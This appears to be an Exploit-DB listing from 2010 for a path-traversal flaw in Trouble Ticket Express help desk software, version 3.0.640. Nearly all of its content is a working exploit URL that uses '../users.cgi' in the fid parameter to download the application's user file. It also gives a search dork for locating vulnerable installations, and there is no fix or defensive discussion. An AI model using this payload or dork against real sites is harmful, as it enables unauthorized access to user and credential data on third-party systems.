Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download

EDB-ID:

11823

CVE:


Author:

n01d

Type:

webapps

Platform:

CGI

Published:

2010-03-20

# Exploit Title: Trouble Ticket Software 0Day
# Date: 3/12/2010
# Author: n01d
# Software Link: http://www.troubleticketexpress.com
# Version: TTX v3.0.640
# Tested on: <=3.0.640
                 ___   _      _
         _ __   / _ \ / |  __| |
        | '_ \ | | | || | / _` |
        | | | || |_| || || (_| |
        |_| |_| \___/ |_| \__,_|
        Bob  @  http://n01d.com


Type:    Trouble Ticket Software 0Day

Vendor:  Remote File Download

Exploit: http://www.example.com/TTXdir/ ttx.cgi?cmd=file&fid=../users.cgi&fn=users.cgi

Dork:    "Help desk software by United Web Coders rev. 3.0.640"

Shouts:  Pro, resU, Bob, Jester, Crusader, Wozniak